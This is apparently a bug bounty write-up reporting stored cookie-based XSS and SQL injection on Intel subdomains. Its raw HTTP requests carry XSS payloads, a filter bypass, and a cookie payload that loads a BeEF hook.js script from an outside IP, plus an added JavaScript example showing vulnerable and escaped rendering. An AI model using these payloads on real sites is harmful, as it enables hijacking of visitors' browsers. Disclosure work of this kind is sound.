
January 25, 2018

Intel SQL Injection And XSS On All Subdomains

Greetings,

Summary

I tested for XSS on the Intel main domain, and the `intel_searchTerms` cookie parameter caught my attention. This made me suspicious, so I tried some XSS payloads in this parameter and found that it was vulnerable. When I looked at the HTTP header information, I noticed that it was also SQL injection. This cookie parameter affects the whole domain, because the cookie is sent to all subdomains.

Details

The first request that occurs when I open the site is:

GET /libs/granite/csrf/token.json HTTP/1.1
Host: www.intel.com.tr
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Referer: https://www.intel.com.tr/content/www/tr/tr/homepage.html
Cookie: detected_bandwidth=HIGH; src_countrycode=TR; ref=; OldBrowsersCookie=Cookie for old browser popup message
DNT: 1
Connection: close

I kept testing other subdomains to prove that all of them could be affected. I first found the reflected XSS on the search page with the OWASP XSS Framework:
https://www.intel.ca/content/www/ca/en/search.html?toplevelcategory=none&query={XSS Payload}&keyword=a

The XSS filter caught it 🙂

Bypassed with javascript:alert(3):

GET /content/www/ca/en/search.results.html?addSocial=true&pageNumber=0&query=javascript%3Aalert(3)&shadowFilters= HTTP/1.1
Host: www.intel.ca
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: application/json, text/plain, */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Referer: https://www.intel.ca/content/www/ca/en/search.html?toplevelcategory=none&query=javascript:alert(3)
Cookie: detected_bandwidth=HIGH; src_countrycode=TR; ref=; JSESSIONID=7ajppcybxlw81kh5mnxpj8crc; BIGipServerlbauto-prd1fm1pcqapp-4503=!8MUTyQc8l9dFzNdsMwHl7nQUJ7GWX2Up5e2qCWtvLVuyT9jCaNlGMUz8GblnVpexRcbTGYJ9cOVr/3Y=;
DNT: 1
Connection: close

Vulnerability On All Subdomains

Afterwards, this is the new HTTP request:

GET / HTTP/1.1
Host: newsroom.intel.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Cookie: detected_bandwidth=HIGH; src_countrycode=TR; intel_searchTerms=[{%22term%22:%22%5C%22><script>alert(document.domain)</script>%22%2C%22pages%22:[]}]; rxVisitor=1516825112751G6DGT24MQVKRSNLE4CCS5RO8OKP1EFIT; dtPC=7$25148467_104h-vGRFDJAPFPKKJMLMMGADBJNFJOIGNLKVMDK; rxvt=1516826961345|1516825112756; dtSa=-; dtLatC=69; PrefLangIETF=en-US; dtCookie=7$4512B4F8EDABAE08148D7FCE78BDEF6C|RUM+Default+Application|1; ref=; OldBrowsersCookie=Cookie for old browser popup message
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

The vulnerable parameter in the cookie:

intel_searchTerms=[{%22term%22:%22%5C%22><script>alert(document.domain)</script>%22%2C%22pages%22:[]}];

It is now present on all subdomains:

I found 2328 subdomains of intel.com. Of course, fewer of them actually run HTTP or HTTPS services, so the number of affected subdomains is smaller.
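The reason one cookie reaches every subdomain is cookie domain scoping: a cookie set with a parent `Domain` attribute is sent by the browser to that domain and every host beneath it, so any page on any subdomain that renders the stored search term without escaping becomes an injection point. The following is an added example and not code from the write-up or from Intel. It assumes the cookie is set with `Domain=intel.com` (the page shows the cookie on several subdomains but not the `Set-Cookie` header), and the "recent searches" rendering template is hypothetical; the two cookie values are copied from the requests shown above.

```javascript
// Added example (not from the original write-up): how a JSON search-history
// cookie scoped to the parent domain reaches every subdomain, and how it turns
// into XSS when a page renders each "term" straight into HTML.
//
// Assumptions (not stated on the page): the cookie carries "Domain=intel.com",
// and the affected pages use a template like renderRecentSearchesVulnerable().

// RFC 6265 section 5.1.3 domain matching: a cookie with Domain=intel.com is
// sent to intel.com and to every host that ends in ".intel.com".
function cookieDomainMatches(hostname, cookieDomain) {
  const host = hostname.toLowerCase();
  const dom = cookieDomain.toLowerCase().replace(/^\./, '');
  return host === dom || host.endsWith('.' + dom);
}

// Pull one cookie out of a raw Cookie request header by name.
function getCookie(cookieHeader, name) {
  for (const part of cookieHeader.split(';')) {
    const eq = part.indexOf('=');
    if (eq === -1) continue;
    if (part.slice(0, eq).trim() === name) return part.slice(eq + 1).trim();
  }
  return null;
}

// Decode and parse intel_searchTerms: a percent-encoded JSON array of
// {"term": "...", "pages": [...]} objects. Returns [] on malformed input
// (bad percent-encoding, bad JSON, wrong shape) instead of throwing.
function parseSearchTerms(rawValue) {
  if (rawValue === null || rawValue === undefined) return [];
  try {
    const parsed = JSON.parse(decodeURIComponent(rawValue));
    if (!Array.isArray(parsed)) return [];
    return parsed.filter(e => e && typeof e.term === 'string').map(e => e.term);
  } catch (e) {
    return [];
  }
}

// Vulnerable rendering (hypothetical template): the term is concatenated into
// markup unescaped, so "\"><script>..." breaks out of the attribute.
function renderRecentSearchesVulnerable(terms) {
  return terms.map(t => `<li><a href="/search.html?query=${t}">${t}</a></li>`).join('');
}

// Hardened rendering: HTML-escape the text node, percent-encode the URL part.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}
function renderRecentSearchesSafe(terms) {
  return terms
    .map(t => `<li><a href="/search.html?query=${encodeURIComponent(t)}">${escapeHtml(t)}</a></li>`)
    .join('');
}

// Constructed Cookie headers using the values from the requests in the write-up.
const ALERT_COOKIE_HEADER =
  'detected_bandwidth=HIGH; src_countrycode=TR; ' +
  'intel_searchTerms=[{%22term%22:%22%5C%22><script>alert(document.domain)</script>%22%2C%22pages%22:[]}]; ref=';
const HOOK_COOKIE_HEADER =
  'intel_searchTerms=[{%22term%22:%22<script%20src=%5C%22http://159.89.186.224:3000/hook.js%5C%22></script>%22%2C%22pages%22:[]}' +
  '%2C{%22term%22:%22%5C%22><script>alert(document.domain)</script>%22%2C%22pages%22:[]}]';

// Run the whole chain for one request's Cookie header.
function demo(cookieHeader) {
  const terms = parseSearchTerms(getCookie(cookieHeader, 'intel_searchTerms'));
  return {
    terms,
    vulnerable: renderRecentSearchesVulnerable(terms),
    safe: renderRecentSearchesSafe(terms),
  };
}

for (const host of ['www.intel.com', 'newsroom.intel.com', 'supporttickets.intel.com', 'www.intel.ca']) {
  console.log(host, 'receives Domain=intel.com cookie:', cookieDomainMatches(host, '.intel.com'));
}
console.log(demo(ALERT_COOKIE_HEADER));
```

Note that `www.intel.ca` does not domain-match `intel.com`; the `.ca` and `.com.tr` sites in the write-up are separate registrable domains, and the cookie only travels automatically across hosts under `intel.com`. The hardened renderer fixes the sink, but the real mitigation is to stop treating a client-controlled cookie as trusted markup on every subdomain.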

SQL Injection

I found the SQL injection vulnerability using sqlmap. Extracting any data from the database is not allowed under the bug bounty scope, so I did not go further and stopped there. If I had had the opportunity to pursue it, I could have run code.

Exploit

I changed the payload so that the request would come to BeEF:

POST /_ui/networks/tracking/NetworkTrackingServlet HTTP/1.1
Host: supporttickets.intel.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Referer: https://supporttickets.intel.com/?lang=en-US
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 183
Cookie: detected_bandwidth=HIGH; src_countrycode=TR; intel_searchTerms=[{%22term%22:%22<script%20src=%5C%22http://159.89.186.224:3000/hook.js%5C%22></script>%22%2C%22pages%22:[]}%2C{%22term%22:%22<script%20src=%5C%22http://x:3000/hook.js%5C%22></script>%22%2C%22pages%22:[]}%2C{%22term%22:%22%5C%22><script>alert(document.domain)</script>%22%2C%22pages%22:[]}]; rxVisitor=1516825112751G6DGT24MQVKRSNLE4CCS5RO8OKP1EFIT; dtPC=7$88200515_835h-vGRFDJKSGOIIORLMMGAJMKMHLJVGNLKVWOJ; rxvt=1516890027158|1516888200530; dtSa=-; dtLatC=283; PrefLangIETF=en-US; pctrk=6349d0e9-cbb4-4808-a6f3-fae717f5acc5; ref=; BaseCulture=en-us; dtCookie=7$4512B4F8EDABAE08148D7FCE78BDEF6C|RUM+Default+Application|1; OldBrowsersCookie=Cookie for old browser popup message
DNT: 1
Connection: close

logLines=%5B%7B%22logName%22%20:%20%22network%22,%20%22logLevel%22%20:%20%22INFO%22,%20%22logAttrs%22%20:%20%7B%22pageId%22:%20%220660P000000yK7u%22,%20%22viewId%22:%20%22%22%7D%7D%5D

The request arrived at my server:

From here you can send messages to the hooked browser, execute code, and request access to the camera.

PoC

Posted in: Bug Bounty, Web Security, Write-Up